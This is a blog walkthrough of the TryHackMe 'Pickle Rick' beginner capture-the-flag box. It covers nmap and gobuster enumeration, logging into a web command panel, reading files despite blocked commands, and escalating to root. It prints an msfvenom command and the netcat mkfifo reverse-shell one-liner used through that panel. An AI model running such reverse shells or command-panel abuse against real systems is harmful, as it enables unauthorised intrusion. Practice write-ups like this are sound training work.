Pickle Rick a very fun themed box featured on the Try Hack Me complete beginner learning path. It is placed after users have completed a range of Linux introductory tasks, networking basics and web hacking fundamentals. I think it is well placed as the user should be able to make it through the box without any hints and there is more than one way to make it through this box.
I will go through a few of the different methods I used and hopefully they will add to your list of tactics the same way I have learnt from others.
To start with I will just run a basic nmap scan to see what we have.
nmap -sC -sV ip_address
We don’t have any credentials yet to look at ssh so we will start with the web page “Rick is sup4r cool”
The landing page itself does not have any hyperlinks to any other pages. An inspection of the page itself reveals some information however.
For now we will record the username R1ckRul3s in our notes.
As the page does not link anywhere else I run gobuster to see what else is available.
First I have a look at robots.txt to see if there is anything interesting.
The only thing in robots.txt is the string **************** which I will record in my notes.
Next I move onto the assets folder.
Relevant images for the site appear to be here but there doesn’t appear to be any other useful information.
nmap -sV --script=vuln ip_address
Running a further nmap scan for vulnerabilities reveals one important page.
Entering The Portal
Navigating to /login.php shows the following page.
Given the details that we recorded earlier, lets try username R1ckRul3s and password ****************
Now we get access to ip_address/portal.php
Looking at the other menu pages (Potions, Creatures, Beth Clone Notes) shows the following page.
Moving back to the command panel page we can try some commands to see what access we have.
We can see we currently have access as user www-data. Next we will list what files are available.
The 2 interesting files we find here are Sup3rS3cretPickl3Ingred.txt and clue.txt. I then tried to use cat to read the contents of the file.
Oh dear, it appears some commands have been disabled to try and make it difficult for us to progress. Fortunately there are lots of other methods to try. These two files we can simply path to in our browser. ip_address/Sup3rS3cretPickl3Ingred.txt and that will give us our First Ingredient.
Before enumerating further with our command panel we can take a look at clue.txt with the same method which tells us to “Look around the file system for the other ingredient.”
The Second Ingredient
Using the command window we can explore the file system and will eventually reach /home/rick and locate a file called “second ingredients”
Now this file we cant path to in our browser, so I’m going to go through a few different commands to get what we want.
Coming from a digital forensics background I quite like hexdump and xxd. they will output the file like this.
Some other commands that appear to work are “less” and “strings”.
The Final Ingredient And Shell
Now that we have the Second ingredient, its time to go searching for the third one. Now I had a good look through the file system and nothing was standing out. so I thought I would check to see what permissions the user has.
to make my life easier I thought I would try get a simple reverse shell and generated one from msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=[local_ip] lport=4444 R
That generates this handy command string that I can run in the control panel. I set netcat to listen on port 4444 and run the following
mkfifo /tmp/gceiday; nc local_ip 4444 0</tmp/gceiday | /bin/sh >/tmp/gceiday 2>&1; rm /tmp/gceiday
This shell would have made the previous section a bit easier. From this I switch to the root user and have a look in the root directory. There we find a file named 3rd.txt. In this shell I can use cat and boom. There we have the Third ingredient, finishing what was a nice fun box to complete.
I’m sure there are many many other options to complete this box and I look forward to reading other walkthroughs to see what paths they took.
The only other thing I found was a html comment on the portal.php page that looks to be encoded base64.
Sure enough it is 7 times encoded base64 and reads “rabbit hole” which for me seems appropriate as I feel like I am going down the rabbit hole every time I start on a new box.
Thank you for reading and credit to tryhackme for creating this box.